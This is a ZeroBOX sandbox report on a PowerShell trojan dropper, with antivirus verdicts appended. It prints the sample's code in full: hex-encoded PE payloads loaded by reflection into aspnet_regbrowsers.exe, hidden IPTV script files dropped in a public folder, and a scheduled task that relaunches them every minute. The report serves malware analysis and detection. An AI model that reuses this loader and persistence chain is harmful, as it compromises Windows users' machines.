popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$Content = @'
$trobs = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=76/=6A/=7A/=64/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=02/=01/=0B/=01/=08/=00/=00/=F0/=00/=00/=00/=0A/=00/=00/=00/=00/=00/=00/=2E/=0E/=01/=00/=00/=20/=00/=00/=00/=20/=01/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=00/=60/=01/=00/=00/=02/=00/=00/=00/=00/=00/=00/=02/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=00
$wyzzwy = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=28/=F3/=56/=8C/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=0E/=21/=0B/=01/=30/=00/=00/=DC/=02/=00/=00/=06/=00/=00/=00/=00/=00/=00/=2E/=FB/=02/=00/=00/=20/=00/=00/=00/=00/=03/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=06/=00/=00/=00/=00/=00/=00/=00/=00/=40/=03/=00/=00/=02/=00/=00/=00/=00/=00/=00/=03/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=0
Sleep 5
[Byte[]] $bbb = $trobs -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $wyzzwy -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
$YIX = [Reflection.Assembly]::Load($pe)
$gss = $YIX.GetType('NewPE.PE' -replace '', '')
$IRW = $gss.GetMethod('Execute')
$KEZ = 'C:\Windows\Micr' -replace '', ''
$ODW = $KEZ + 'osoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe' -replace '', ''
$WYZU = @(
$ODW,
$bbb
$IUWS = $IRW.Invoke(
$null,
[object[]] $WYZU
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.ps1", $Content)
$Content = @'
@e%IPTV%%IPTV% off
set "ps=powershell.exe"
set "params=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"
set "cmd=C:\Users\Public\Videos\IPTV.ps1"
%ps% %params% -Command "& '%cmd%'"
exit /b
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.bat", $Content)
$Content = @'
on error resume next
Function CreateWshShellObj()
Dim objName
objName = "WScript.Shell"
Set CreateWshShellObj = CreateObject(objName)
End Function
Function GetFilePath()
Dim filePath
filePath = "C:\Users\Public\Videos\IPTV.bat"
GetFilePath = filePath
End Function
Function GetVisibilitySetting()
Dim visibility
visibility = 0
GetVisibilitySetting = visibility
End Function
Function RunFile(wshShellObj, filePath, visibility)
wshShellObj.Run filePath, visibility
End Function
Set wshShellObj = CreateWshShellObj()
filePath = GetFilePath()
visibility = GetVisibilitySetting()
Call RunFile(wshShellObj, filePath, visibility)
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.vbs", $Content)
Sleep 2
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.RegistrationInfo.Description = "Runs a script every 1 minutes"
$taskDefinition.Settings.Enabled = $true
$taskDefinition.Settings.DisallowStartIfOnBatteries = $false
$trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger
$trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")
$trigger.Repetition.Interval = "PT1M"
Action
$action = $taskDefinition.Actions.Create(0) # 0 = ExecAction
$action.Path = "C:\Users\Public\Videos\IPTV.vbs"
$taskFolder = $scheduler.GetFolder("\")
$taskFolder.RegisterTaskDefinition("IPTV", $taskDefinition, 6, $null, $null, 3)
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.AEL
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Emsisoft Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
FireEye Clean
Sophos Clean
GData Clean
Jiangmin Clean
Varist Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan-Dropper.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.